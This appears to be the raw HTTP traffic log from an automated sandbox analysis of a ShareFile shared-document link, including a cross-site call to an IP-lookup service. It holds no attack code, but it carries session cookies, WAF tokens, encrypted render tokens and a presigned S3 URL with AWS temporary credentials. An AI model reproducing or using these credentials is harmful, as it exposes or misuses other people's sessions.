AWSALBTG=CXe69sCbz8r4rhPzyocHw/hbUJ2MbCam+4RASz1SwVfiTKgqPCsnftKw2Gu40Epl2ecC0FXPRPenJu9x+Mi/Uxn+ZMQeOIqu1V6W4T2dvc2vcGsCzB1eRTXOdj0MQDSGYPhHcFdl2uidzASxnJr/9ZL5IeLH2TC2v7Bq2WKhMovAKj91XLnE3kFQPXzCqmDIMUEDdZI3WGiRnavpexD+ixYxeUV7uLwO0BcfSV6XX98/Bn5NqzC56p36KNLP6qJ7; AWSALBTGCORS=CXe69sCbz8r4rhPzyocHw/hbUJ2MbCam+4RASz1SwVfiTKgqPCsnftKw2Gu40Epl2ecC0FXPRPenJu9x+Mi/Uxn+ZMQeOIqu1V6W4T2dvc2vcGsCzB1eRTXOdj0MQDSGYPhHcFdl2uidzASxnJr/9ZL5IeLH2TC2v7Bq2WKhMovAKj91XLnE3kFQPXzCqmDIMUEDdZI3WGiRnavpexD+ixYxeUV7uLwO0BcfSV6XX98/Bn5NqzC56p36KNLP6qJ7; AWSALB=PiZJJPHIf6floOeE0yH7k3MOwFLN0p0cThshcenGkq3H/M+cFQj4KRIU16wId/Zhm6ObFIm0TdgsERNAnKaSmsXXmxeq1roJ0HwMgEPo7xyqk8Lad5jn6AHCbl6v; AWSALBCORS=PiZJJPHIf6floOeE0yH7k3MOwFLN0p0cThshcenGkq3H/M+cFQj4KRIU16wId/Zhm6ObFIm0TdgsERNAnKaSmsXXmxeq1roJ0HwMgEPo7xyqk8Lad5jn6AHCbl6v
Source: global trafficHTTP traffic detected: GET /bundles/2c61db7618456a4b4ea2.js HTTP/1.1Host: averellharriman.sharefile.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=12bf9751-a126-42d5-b058-d35b3aa4244a:EQoAaZmJtjsOAAAA:xkRlisV0689T1jmvmwxmHz1sL5bM9WuSH+rXjwIhYR6qWw8NOhKgLCAPwLqt3fSbjbgzgiuAzKyX+7tSjbgWy24fIVvWGKKVog/+rLdDfPIayaMdLeaL6NEQuqyWfw/X+DnrbYz2hDGC1qgD5K5iPzaEZItkrAqmwwXiRdNnu7sXB9o3SJvUp3LqL1wYSgbzBvTAdqCN7z9gMzoyf8kueXXkIR64a3F4jv5RXcYMHWZnKKDQIuWzdON6LYN/BO2IFkI/BfWa; AWSALBTG=NtdSJs4ByqoShXxL3GVKv7M4kryhOkXoSTO7cEi/61LPX7kUwcQOrYLdm6S1rlfMKBhm2bqQIrloqgNw5OEgKVOl/q+nvR/hhBTNFuQJwU+iQQ34OeH285O2IQ23C4ETvqPHb6n9dUfSAAkWqVa4ztk9UGNTWEcHtyyZZa0741+750sCeDMsQl6VCOt/fVOEIwDa2PHl/bbdnSSos0WN4pvnPkzLqfAemeSoOkmbofslR72VfNjM9GAJQwrTdRcs; AWSALBTGCORS=NtdSJs4ByqoShXxL3GVKv7M4kryhOkXoSTO7cEi/61LPX7kUwcQOrYLdm6S1rlfMKBhm2bqQIrloqgNw5OEgKVOl/q+nvR/hhBTNFuQJwU+iQQ34OeH285O2IQ23C4ETvqPHb6n9dUfSAAkWqVa4ztk9UGNTWEcHtyyZZa0741+750sCeDMsQl6VCOt/fVOEIwDa2PHl/bbdnSSos0WN4pvnPkzLqfAemeSoOkmbofslR72VfNjM9GAJQwrTdRcs; AWSALB=z+lNotv1ugup+Pu4h0mwPjBkH83Zbip0wbHWhvBpJZI8Z6B7Cd4Gqzn7r5LSHGUdIg4WPJvdHSikjbgUg/ZsdmIA29OpcBlBkhgFdvgMOYggsBpvbyhmmAM/I7xO; AWSALBCORS=z+lNotv1ugup+Pu4h0mwPjBkH83Zbip0wbHWhvBpJZI8Z6B7Cd4Gqzn7r5LSHGUdIg4WPJvdHSikjbgUg/ZsdmIA29OpcBlBkhgFdvgMOYggsBpvbyhmmAM/I7xO
Source: global trafficHTTP traffic detected: GET /bundles/5626aad50bfaf67fedc0.js HTTP/1.1Host: averellharriman.sharefile.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=12bf9751-a126-42d5-b058-d35b3aa4244a:EQoAaZmJtjsOAAAA:xkRlisV0689T1jmvmwxmHz1sL5bM9WuSH+rXjwIhYR6qWw8NOhKgLCAPwLqt3fSbjbgzgiuAzKyX+7tSjbgWy24fIVvWGKKVog/+rLdDfPIayaMdLeaL6NEQuqyWfw/X+DnrbYz2hDGC1qgD5K5iPzaEZItkrAqmwwXiRdNnu7sXB9o3SJvUp3LqL1wYSgbzBvTAdqCN7z9gMzoyf8kueXXkIR64a3F4jv5RXcYMHWZnKKDQIuWzdON6LYN/BO2IFkI/BfWa; AWSALBTG=/UdrESIES/4HzpyGgr2ckdlASeEgxlv0rzaMZ7YJf5TbwDjXLwT64mwFSYO70fhOQ0dbchtUQESUcJfKtvK5B+AChZH5OSVXlJm/xecY1lUcuISjgl0pe0csSqYmjQ4di6CL17djZMVa1E8E18ggksnaJPdYjEkxrLMQrboPkwAbpwlIc0TJU22IIibQMQMotHtHyysF/Sj5nvCkJ8HQsbpUQgR73JZn6OVQUJtD0EOWahBdc3c+ZSpagfU/pENp; AWSALBTGCORS=/UdrESIES/4HzpyGgr2ckdlASeEgxlv0rzaMZ7YJf5TbwDjXLwT64mwFSYO70fhOQ0dbchtUQESUcJfKtvK5B+AChZH5OSVXlJm/xecY1lUcuISjgl0pe0csSqYmjQ4di6CL17djZMVa1E8E18ggksnaJPdYjEkxrLMQrboPkwAbpwlIc0TJU22IIibQMQMotHtHyysF/Sj5nvCkJ8HQsbpUQgR73JZn6OVQUJtD0EOWahBdc3c+ZSpagfU/pENp; AWSALB=fSS8VHt4GmHS/NIrsotuC5PqDPnKx+tt1lyjH+z5qkihAWKIC1CdE0vDPw5XOdaarC24MnMAUeH+BKJITEKoDaZDYZ1yJuRXM1ISDerVqBPywRWO1zM7Z+eJLQ67; AWSALBCORS=fSS8VHt4GmHS/NIrsotuC5PqDPnKx+tt1lyjH+z5qkihAWKIC1CdE0vDPw5XOdaarC24MnMAUeH+BKJITEKoDaZDYZ1yJuRXM1ISDerVqBPywRWO1zM7Z+eJLQ67
Source: global trafficHTTP traffic detected: GET /bundles/d5a7899d41651404accd.js HTTP/1.1Host: averellharriman.sharefile.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=12bf9751-a126-42d5-b058-d35b3aa4244a:EQoAaZmJtjsOAAAA:xkRlisV0689T1jmvmwxmHz1sL5bM9WuSH+rXjwIhYR6qWw8NOhKgLCAPwLqt3fSbjbgzgiuAzKyX+7tSjbgWy24fIVvWGKKVog/+rLdDfPIayaMdLeaL6NEQuqyWfw/X+DnrbYz2hDGC1qgD5K5iPzaEZItkrAqmwwXiRdNnu7sXB9o3SJvUp3LqL1wYSgbzBvTAdqCN7z9gMzoyf8kueXXkIR64a3F4jv5RXcYMHWZnKKDQIuWzdON6LYN/BO2IFkI/BfWa; AWSALBTG=dkrQaTH+nr6hc79dHI0PNsybBWDO2XaUZA/nwj5YJZp6sPUeq1r7JngHWEomqktTWWxVahkniIAdye1jcJDl2kNitGKtOpbV9VKmQMdt/0tVrsMxrllAs3dQbILudVG1g28AgIf/BEPTCZDHz/MgCmnJcUHvAo6YL/SIsSak+/jugzCv1jKsa1paHlwyfB2LvsMOJPIDeT7dgR3T1UDxLeRVkGLvoNh67BTYkGiuy5pI/eTRLQ90gBmZrhMuxUB5; AWSALBTGCORS=dkrQaTH+nr6hc79dHI0PNsybBWDO2XaUZA/nwj5YJZp6sPUeq1r7JngHWEomqktTWWxVahkniIAdye1jcJDl2kNitGKtOpbV9VKmQMdt/0tVrsMxrllAs3dQbILudVG1g28AgIf/BEPTCZDHz/MgCmnJcUHvAo6YL/SIsSak+/jugzCv1jKsa1paHlwyfB2LvsMOJPIDeT7dgR3T1UDxLeRVkGLvoNh67BTYkGiuy5pI/eTRLQ90gBmZrhMuxUB5; AWSALB=lWbdt3Ah2JuwBrUGJfcwfa77tBmnBanc6V6m+mw/4zEw+R/cQKm6nBZGjPhYLOXu79X9FqrsrL1Jw/T1OBs843X75E+FcOTAE2v7NB9BC+JQvcOWEf95F06BbSzl; AWSALBCORS=lWbdt3Ah2JuwBrUGJfcwfa77tBmnBanc6V6m+mw/4zEw+R/cQKm6nBZGjPhYLOXu79X9FqrsrL1Jw/T1OBs843X75E+FcOTAE2v7NB9BC+JQvcOWEf95F06BbSzl
Source: global trafficHTTP traffic detected: GET /bundles/c5f4a641bb6587c3f44f.js HTTP/1.1Host: averellharriman.sharefile.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=12bf9751-a126-42d5-b058-d35b3aa4244a:EQoAaZmJtjsOAAAA:xkRlisV0689T1jmvmwxmHz1sL5bM9WuSH+rXjwIhYR6qWw8NOhKgLCAPwLqt3fSbjbgzgiuAzKyX+7tSjbgWy24fIVvWGKKVog/+rLdDfPIayaMdLeaL6NEQuqyWfw/X+DnrbYz2hDGC1qgD5K5iPzaEZItkrAqmwwXiRdNnu7sXB9o3SJvUp3LqL1wYSgbzBvTAdqCN7z9gMzoyf8kueXXkIR64a3F4jv5RXcYMHWZnKKDQIuWzdON6LYN/BO2IFkI/BfWa; AWSALBTG=lZDzmdTFo/TYHguhRWsxxt99wIDGYAG++slMjQGFl6eEMEL+v935kHL1MZJtzV7g5sPeO0zxhOEmeycIEyVfjpbn+UjQzcyRqSY2rbJPNUssN53h2RHlGHH8+AJCGsmm722xEVP1U1PCr9XJ7sE04DaqsTqjIbSZL+z4+HosxRoNLfQf7+XYMzzZNXuBLlgtuWZX9SsR37AX+Rz0lNc5QI52s/CKj75Zu/yG+24zDlbrSJvtvc5ejkDyz3yjU8Hd; AWSALBTGCORS=lZDzmdTFo/TYHguhRWsxxt99wIDGYAG++slMjQGFl6eEMEL+v935kHL1MZJtzV7g5sPeO0zxhOEmeycIEyVfjpbn+UjQzcyRqSY2rbJPNUssN53h2RHlGHH8+AJCGsmm722xEVP1U1PCr9XJ7sE04DaqsTqjIbSZL+z4+HosxRoNLfQf7+XYMzzZNXuBLlgtuWZX9SsR37AX+Rz0lNc5QI52s/CKj75Zu/yG+24zDlbrSJvtvc5ejkDyz3yjU8Hd; AWSALB=eu+dPFQkWCbdGu5tdI7Au+jBXVY55uHPGdTs/HU608iwRUExBiuXJwH6KWmActNSw8chuNUVd3RDfns/ZsXTNxKmJ2k7I3YcbiwbDvcZs3RYG7k3COJUA+NXFv4i; AWSALBCORS=eu+dPFQkWCbdGu5tdI7Au+jBXVY55uHPGdTs/HU608iwRUExBiuXJwH6KWmActNSw8chuNUVd3RDfns/ZsXTNxKmJ2k7I3YcbiwbDvcZs3RYG7k3COJUA+NXFv4i
Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/plain, */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://averellharriman.sharefile.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /service/contentviewer/document/sessionurl HTTP/1.1Host: sf-cv.sharefile.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /service/rendering/api/render/pdf?token=eyJhbGciOiJkaXIiLCJlbmMiOiJBMTI4Q0JDLUhTMjU2In0..Q7p6Se7z_rrUw-RDVj1cbA.eRSOp1dvc0uAFtNSn5y2qE9-Uzf_44p987qv8K9IhB4skSCknQXQjkm4zE2om4j5Ad0c5ow1ORKCzOju5rD1UFbn-qbwTS5G_SyDjD4B5oHoNJGd3MKCE8uoDAweKvdaj5A96Y9-W4xKXQ3EvrENksCF6aWVBwbsMkkDbtV2r0-V2ciWbszLsTtBs14INwl4-uAzezFfYyZjgqTUldCr5LTJJJbXVXmyxDDMT9WBU8Y0THwhYd4IhT85eT7io3UPZ_bC3UOeNa04PmUIaDLbA-Ohm_jy8PW07GBVnCxNR5R8jpAhycjWJE7OYwBCSf2ogC2L3BR4_NiwyP8o8UHmpY9VaXwNjgZMFfTInBeQbpuTDXo7iFj29_TXJ_V2rxR3kpHfOMvb7si0UOpaOa0tIMPkcu2_4cHH8rFDw9Hjn1KFFryey3SGMluJKX7tfHWc6awKx_isZrX2zIgC-qIPG1qf0_GSAZvWczxm5suwslmkd4wl0bh4w2wVXh-ZIKb29T_SAZPyqpFzJF8JgI7bpResK1wvhmMKG4WqJB6gjSacsvXvI9X1GPmvMRg0JFRWc0ptAha9WyPUs7txCBd0QQibo8OxABGG6c6gvllhiFg33q8vPx8ihCTy0yPMJHr6lnKCzHlgpeC9G8OLkcqAQ3pcMn3EjUEhAoMKyB6bHww-wBeuSEbMgnXL6iRzRfke0abBGUfKP4TxNK1oAS5Dj0BvBai1XfHr6e7X7JHgJSD5RHhb8d9RjaktVHb4yd2ZnxJz91CW9WWsiIY5e2mw1Hi-XljTMaT9kW5AxSoGdfvk9FM5Kvx5t0UszcCuZX7n5P4nWk_nEgvoqDaan_LOoNfzT1I3bcKc-6uHpmjNcfb0xLuMob5yvztIcT3R93dF5PdGWXpoIk4nyXIFee-9I2LIAfG_-wTVR0Jg8ZiMGO60-sajOWc4e32EZaV4AYglcVJaw7WbQ0S_QlpBUR4DopzDLEbrxBS9GITBLAYkTL0O0tXW3XhppZS9560wlkhK1euKIVdZOpUEnzgtPI3TJvpJ9ugX2mdIpVZvN2VH4Nw4kyw9XZFRjyymUF2z8siiJDksQ8AEOSjH3qjqEMNoNSMTbBwfw9b26G3xtoV1-SuVAxxew-qa-9LDXH-w8Sgl8FLguNXCFUyDLYcX_Lg9SK2Wf7qyYA0BPkXZoPlQZEjbTF3Q2YCRDONCA934JsR-2n31-oO35jPCZkxHN6--4EsNh9VqVzDwS4tHnHozHDLKu_uj-QIxITcIROnyRYciI_pHA88yOT2V66kv6-cJNBBCN41mCR2TvYaZQf6xWRod6u-O9xOOourJkVhAx39CU5uMp2KLnGKMNhkpLPFWmtnpuKvNsfTnx6RJK8qID8BCn35kmiEGlcRiv2rY_zzdYtpwbE199BdnHlHqCxFusPT1CqQZLxl3t0LqJH4dQYTwYH7_P0-cFHeehut6SSWvjsNQJPADFofxDjjowDDBpq40j75NKokWQ8Bs_YL7xWIjRGhPFiFNt_CDxLCE0F7KGahjUDo5KIPATBRPGzcXmqfdvtL9sTTQQnAKP3pjgRWUlujNCzr1KfVbuk0ELZwI9DlXGb33tVHK6MYmwv0e3mjk_sK2PaDWJbKse_-jqpNX7airhSCfbnK6Y33F0HsmjyfpLIws5ePnrQt3IE9-R4trNE84V78NLgdjG1MGfBINEkYi38mXLE9K3P2yejfTMfh2x1AFSxxbAkN5Xmuq5vNGkG4ss1stOqvb3eLn0duv-hD3oWlFR_djUfxSsyiq8hP1aNVi9IXjp6hwVizLHchzf6sFXvjg2XxKwJDiYm-JYBrAyU6T41YWpHD_Pe4uvTLs6qf3K0jDpRXcYKHRLw.z6-ew7ThYa8acqxGFsW3hA HTTP/1.1Host: sf-renderx-us-east-1.sharefile.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bundles/pdfworker.71b2fed3d97c2433b14536a2de71ac7a.js HTTP/1.1Host: averellharriman.sharefile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerReferer: https://averellharriman.sharefile.com/share/view/s3b96c17360cd43e7bdcaf25a23709fd0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=12bf9751-a126-42d5-b058-d35b3aa4244a:EQoAaZmJtjsOAAAA:xkRlisV0689T1jmvmwxmHz1sL5bM9WuSH+rXjwIhYR6qWw8NOhKgLCAPwLqt3fSbjbgzgiuAzKyX+7tSjbgWy24fIVvWGKKVog/+rLdDfPIayaMdLeaL6NEQuqyWfw/X+DnrbYz2hDGC1qgD5K5iPzaEZItkrAqmwwXiRdNnu7sXB9o3SJvUp3LqL1wYSgbzBvTAdqCN7z9gMzoyf8kueXXkIR64a3F4jv5RXcYMHWZnKKDQIuWzdON6LYN/BO2IFkI/BfWa; AWSALBTG=OxnU0MDP79ZzbhJ8wTxKxLbmD8tMJyvXPt23UGZTaGB0YydRo0bf+9iAM3z4yejY6d0KyjxpC6X+y5z+6jh87r8nuTJbIyZQfciAUX0QGDOV0zlUJxB19prgL7oWrmN4xpC1nd7OBpk0bYx35+nA7rlPsQsNwQs2Ov4wO1kSF5hB/SlfOzYT7LJlL0RVPKH7JtIyfxLMcvnQ4zyLoFFX5NsTxsbWpFQhPYwOHXMIG1D0w7+qy+zRyD02WssYnmHJ; AWSALBTGCORS=OxnU0MDP79ZzbhJ8wTxKxLbmD8tMJyvXPt23UGZTaGB0YydRo0bf+9iAM3z4yejY6d0KyjxpC6X+y5z+6jh87r8nuTJbIyZQfciAUX0QGDOV0zlUJxB19prgL7oWrmN4xpC1nd7OBpk0bYx35+nA7rlPsQsNwQs2Ov4wO1kSF5hB/SlfOzYT7LJlL0RVPKH7JtIyfxLMcvnQ4zyLoFFX5NsTxsbWpFQhPYwOHXMIG1D0w7+qy+zRyD02WssYnmHJ; AWSALB=6O+z0coeL/5vA1RiC9XrO4Jytq17a+9D61cteC6l8LBrUDKj77fHtm+snK3uqdOutEIQdceOAzKVButpwZ12gIuN1LdjEdMD/puBG8VYX8Mq5rp1IGtdHYhaZoT5; AWSALBCORS=6O+z0coeL/5vA1RiC9XrO4Jytq17a+9D61cteC6l8LBrUDKj77fHtm+snK3uqdOutEIQdceOAzKVButpwZ12gIuN1LdjEdMD/puBG8VYX8Mq5rp1IGtdHYhaZoT5
Source: global trafficHTTP traffic detected: GET /service/contentviewer/eventpipeline/preview?r=eyJhbGciOiJkaXIiLCJlbmMiOiJBMTI4Q0JDLUhTMjU2In0..L2YgZQRG0t7vVpTJbaD9PQ.99y4xe99C_nbBQ_UmGA1zyoba7qFAJ1C2TAOL7JbefXlBOd8GeykZ5yG-d-r20OQ2qh_SWJaYwmpyWZvAR59edJCuhHQ8wCseEdLYIM7A_cK3PIikj4qCn_1js8XmVaF3MVeLEF2CF_0beQGbJ29JyytNkT8dynCDvclIiKCEvJy-qBZqbVYGC0sUfXxfYMk5D3nwN23q9rdvOxLwHJUy0aPugq1wpPHb-8M5Fy77zXInCvJOe78t49dGB-QL3CKs27ezewtpZgv5m9RHXUaHeej9PYgWSFaMWCr7q9x22Xc4stzoB22htncOhgGfe4lGVK4CK_yLbecj6N3aXZsjB3_tX2qyNLnca3I11a8ihBo2GujIYWz2kcod6aXUvoYUIBYt3ySPzhEJiDuD1u8vHGJJ6-VkSq6mhV7ji0CBDreOWdyRnchNCB6T64zrtiS.sF0LNGTWcws1a2Qd9qo2VQ HTTP/1.1Host: sf-cv.sharefile.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bundles/pdfworker.71b2fed3d97c2433b14536a2de71ac7a.js HTTP/1.1Host: averellharriman.sharefile.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=12bf9751-a126-42d5-b058-d35b3aa4244a:EQoAaZmJtjsOAAAA:xkRlisV0689T1jmvmwxmHz1sL5bM9WuSH+rXjwIhYR6qWw8NOhKgLCAPwLqt3fSbjbgzgiuAzKyX+7tSjbgWy24fIVvWGKKVog/+rLdDfPIayaMdLeaL6NEQuqyWfw/X+DnrbYz2hDGC1qgD5K5iPzaEZItkrAqmwwXiRdNnu7sXB9o3SJvUp3LqL1wYSgbzBvTAdqCN7z9gMzoyf8kueXXkIR64a3F4jv5RXcYMHWZnKKDQIuWzdON6LYN/BO2IFkI/BfWa; AWSALBTG=TzWFQ2keIy2MGsDrHmrQOlWJa5A9AMBLhyBdLMYT5JXVeqPfPVs9rIO4eZ3KRG+SIMqnCsPujbpJy5HD9RbQME4yF855RYSnJAAx1P4WU8gU4GEa1p+pue63jPFzc69FK+ycigetN5lPu3LFESBWQp4db9KoYizMyRDDIYNSbHO1GvhbYLEe4l1A6fRuv/rDRpZrTxukdVvaobnoF08kGijSMT++W05E4cSqwmFEiuRK6hb9/v2/kXh3QiDqEQU2; AWSALBTGCORS=TzWFQ2keIy2MGsDrHmrQOlWJa5A9AMBLhyBdLMYT5JXVeqPfPVs9rIO4eZ3KRG+SIMqnCsPujbpJy5HD9RbQME4yF855RYSnJAAx1P4WU8gU4GEa1p+pue63jPFzc69FK+ycigetN5lPu3LFESBWQp4db9KoYizMyRDDIYNSbHO1GvhbYLEe4l1A6fRuv/rDRpZrTxukdVvaobnoF08kGijSMT++W05E4cSqwmFEiuRK6hb9/v2/kXh3QiDqEQU2; AWSALB=1IxuqOdd7HC0yPXn4H9R0LEap21yeOAAlE9BvYFHvbCSFLN5n9S5ymscKf4k7dYTUs6y0kGMwYSRFbcK7FLBosgh2G22wZwq9MKljNW/jv5W/TFEUC9fX4MvlnCU; AWSALBCORS=1IxuqOdd7HC0yPXn4H9R0LEap21yeOAAlE9BvYFHvbCSFLN5n9S5ymscKf4k7dYTUs6y0kGMwYSRFbcK7FLBosgh2G22wZwq9MKljNW/jv5W/TFEUC9fX4MvlnCU
Source: global trafficHTTP traffic detected: GET /renderx/RenderOutput/a2686d04-5eab-df7f-5602-cc391d4b2e38/VOWithPDFSecurity/cf804dbe8dfa5e48aa89837887e966e8?AWSAccessKeyId=ASIAWSHYYC7RUDGK6WRV&Expires=1730838707&x-amz-security-token=IQoJb3JpZ2luX2VjEJP%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJGMEQCIGo4KpG1v4XQWBoCg2%2BHZ72AGX6XeD4l%2FMgxmMH9zPQsAiAFo1%2FLQaX5KzGgjXDGxbreOp1GM2%2FGi9VKibzLH14GXiq6BQgcEAAaDDQ1MTQ5MzIzODc1NSIM5ZAobSqNv9HcN4taKpcFaC5c9iXyRB%2BnRXEPpqTR8BX9iO%2FP17759nDT2WKZ8rOZ%2BSf%2BScymuCbUM3Xir8BIhs0hyJWLM32LaT3OcQclkQ3AT1%2BPoPKyCxPcM0tHN%2F%2BhioBkVUC9bi0F82azyguylKIdPByQlRJvENfg%2Bq8nxSDPcPoupzQt7%2BwzQ%2FyGmjmGzpbb4kxXf0A17fh1Cn0VR7CJvSYVyMY%2BSs1aj70zA0xSfQwLtggK6T%2F92%2FgAGuEo5FAvhjv5xnOdeMXOsbMYeY2tyrdUw7o5rdAC7lUp5JqElJbC5PG1dTF1QINw5QaFLYd8lDbWZr1Ygv9sruphlLAVTCRZ9jCNSvJCxLrkmyttW7sR2RK9t7ARn1mOPQL4WJMUZX%2BtLjh%2FlM%2FdSA%2B24wpcDQf4fKUV8WeRdy%2FCQOGeCjhl3zVHqXuvAps2aulyY4ISbXtTsghTrjzcSXrt9uHsf0C%2FkozNmXA46wB43D%2FPzsQ0HTy1WDCQAj9VxL88F%2F3XHZbyk7hl3vlLbl9%2F7QDDz%2BkqUnGFoUet3MMKQyHlb5Yygs77R5s%2B9uF1JKdk%2BDCU5qNwASU25HeIyOognpsmcc9b%2B9kLpzr9RhzG9HYH1aUcbqmbs58IDAZ%2BdW69KE9HB2Trj3OGgeSbTSCtpnFeipeC8K9pVwiG7lNJDwpKpBtBttvmm43KPcv3ymPhGsldVrATxa8%2F1lTAznLAfPiH3piwGR2X0bVuf5w7SlM1Tb2KKEoW3Uz6%2BJ63Qi4k82J0TCG3yKM1FwEHeu71LzQxFWbw2Rmmn8Gbi2ogTVXz4lSyirWAE78XyI3n6uogExWpHWriIXYZrSuQgJYCNO7hMKnNcf6uBIN5%2FiTsaPZrtaLwN%2FEnQGky8yoygIgV9joOBw%2FHMK3XqbkGOrIBo75KDadttrB40wIWrBcJ9yJFmg6NKu72c8QlvZE1PbB%2BHJyg656KyXICeKJ60NooKeKEegBqAWUU2RChvxlGm5bBomD9N372Jab5ZICG%2BKuj5ng3YShpUkl%2BqXFqJoeMZQUTbkPWUOpDWWu8kTHQh66sXa0wB7nhxQfcqSD0k%2FrI8dr91d4bkERwaDXq4reGmO65JpYmJJS%2FJQgIzrNUoCUrP0lnOMIgRbs0BSxeZNNLuQ%3D%3D&Signature=B%2F%2FhXyZUNHpUMroNVT1ooCDER4Q%3D HTTP/1.1Host: sf-temp-us-east-1-production.s3.amazonaws.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/plain, */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://averellharriman.sharefile.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: identityAccept-Language: en-US,en;q=0.9Range: bytes=0-27130
Source: global trafficHTTP traffic detected: GET /ab HTTP/1.1Host: evoke-windowsservices-tas.msedge.netCache-Control: no-store, no-cacheX-PHOTOS-CALLERID: 9NMPJ99VJBWVX-EVOKE-RING: X-WINNEXT-RING: PublicX-WINNEXT-TELEMETRYLEVEL: BasicX-WINNEXT-OSVERSION: 10.0.19045.0X-WINNEXT-APPVERSION: 1.23082.131.0X-WINNEXT-PLATFORM: DesktopX-WINNEXT-CANTAILOR: FalseX-MSEDGE-CLIENTID: {c1afbad7-f7da-40f2-92f9-8846a91d69bd}X-WINNEXT-PUBDEVICEID: dbfen2nYS7HW6ON4OdOknKxxv2CCI5LJBTojzDztjwI=If-None-Match: 2056388360_-1434155563Accept-Encoding: gzip, deflate, br
